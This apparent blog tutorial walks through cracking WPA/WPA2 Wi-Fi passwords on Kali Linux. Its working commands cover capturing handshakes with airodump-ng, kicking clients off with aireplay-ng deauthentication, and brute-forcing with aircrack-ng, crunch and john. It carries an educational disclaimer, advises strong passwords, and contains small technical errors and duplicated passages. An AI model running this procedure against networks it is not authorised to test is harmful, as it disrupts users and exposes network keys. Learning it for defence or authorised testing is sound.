Note:
This article is written for educational purposes only. It is illegal to hack a network that does not belong to you. You may get yourself in trouble, say, if the network you are trying to get into, logs packet injections from your machine, the digital signatures you left behind is the traceability lead. Therefore, please do not commit crime.
This test was done on Kali Linux, on VMPlayer. The method described in this article cannot hack a WPA / WPA2 wireless network if there is no client connected. Also, it is difficult to obtain a handshake if the client signal is very weak.
Step 1: Check Your Wireless Adapter
root@kali:~/test# airmon-ng
This command lists your wireless adapter, if you have one. On a virtual machine, you may experience that the wireless adapter cannot be detected. In this case please read how-to-put-wireless-adapter-in-monitor
You need to kill those processes because they will cause trouble when you run aireplay-ng, i.e. you may not be able to capture a handshake.
root@kali:~/test# airmon-ng check
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
3179 dhclient
3260 NetworkManager
Step 3: Kill these processes
airmon-ng check kill
Step 4: Put your wireless adapter in monitor mode
airmon-ng start wlan0
Step 5: Pre-scan Available Wireless Network
airodump-ng mon0
This displays a list of wireless networks with some details such as signal strength, channel number, AP mac, network name, connected clients mac addresses, etc.
Jot down the channel and mac address of the network you intend to crack. After that, you can exit by pressing Ctrl-C or q.
Step 5: Monitor and capture Network Packet and Handshake to a File
airodump-ng -c 11 -w captured --bssid <AP mac address> mon0
This will monitor and wait for handshake. The channel is 11 but yours may be different. File prefix is "captured". Just leave it running and do not exit, yet.
Step 6: Injecting Network Packets to Force the Client to Re-Associate with the AP
Open a new terminal and run the command:
aireplay-ng -0 10 -a <AP mac address> mon0
Attack mode -0 is specified for WPA / WPA2 (-1 is only good for WEP). Run this command and take note of handshake signal captured on the other terminal where airodump-ng was executed. Rest for a few seconds in between each attack, until a handshake is captured, then stop both aireplay-ng and airodump-ng (on the other terminal).
This attacks attempt to kick the connected client out. When the AP tries to reconnect with the client, your machine will have the chance to get a handshake, which contains a public key and private key signatures that allow the password to be cracked.
The handshake is captured in a file you specified in airodump-ng, i.e. -w captured. So, the file is "captured-01.cap" if Step 5 is run for the first time. If airodump-ng had exited and run for the 2nd time, the file is "captured-02.cap", so on and so forth. Take note of the file name that contain the handshake.
In the occasion where the client signal is weak, it may be easier by specifying the cilent MAC address:
aireplay-ng -0 10 -a <AP MAC address> -c <client MAC address> mon0
In the occasion where the client signal is weak, it may be easier by specifying the cilent MAC address:
aireplay-ng -0 10 -a <AP MAC address> -c <client MAC address> mon0
Step 7: Crack the Password
You can do this step on another day without the need to be around the targeted AP network. Notice if the password is long enough, it is very difficult to crack. The following are the reasons why.
Calculating how long you need to run all password combinations by brute force:
Depending on your CPU power, the number of password tests per second varies. If the password has 8 alpha-numeric character combinations, there are 36 possible characters that can fill each character, that makes it 38^8 number of combinations. i.e. 2821109907000 possible combinations! If the CPU power is 1000 passwords per second, you need 89.4 years to completely brute force all passwords!
Therefore, it is encourage to use long passwords and make use of lower case, upper case, numerics, or even symbols such as +, -, %, etc in your password. A 16 character password with lower and upper case, and numerics combinations has a total of 62^16 = 4.77x10^28 combinations. Even with a CPU power of 1 billion passwords per second, you will need 1.5 trillion years to brute force all passwords!
Therefore, the use of a good password list may crack faster, as people tends to be negligent and assigned password that is easy to remember.
Anyways, these are the commands that are commonly used:
By password list:
aircrack-ng -w /mydir/wordlist captured-01.cap
The ability to crack is as good as the quality of the wordlist.
By word crunching:
crunch 6 8 0123pasword | aircrack-ng -a 2 captured-01.cap -e <AP network name> -b <AP mac address> -w -
The AP mac address can be omitted. The crunch command generates passwords combination from 6 to 8 characters using the characters specified "0123pasword". In this case there are a total of 11^6+11^7+11^8 = 235617613 combinations. Need 2.7 days to test all passwords for a 1000 words/sec CPU power.
Word crunching is used if you know some of the characters that are used in the passwords.
Word crunching is used if you know some of the characters that are used in the passwords.
man crunch for more options.
By brute force using john the ripper and remember the session:
john --incremental=all --session=MyBruteSession --stdout | aircrack-ng -a 2 -e <AP network name> captured-01.cap -w -
To restore previous session and continue with the last tested password:
john --restore=MyBruteForce | aircrack-ng -a 2 -e <AP network name> captured-01.cap -w -
That's it.
No comments:
Post a Comment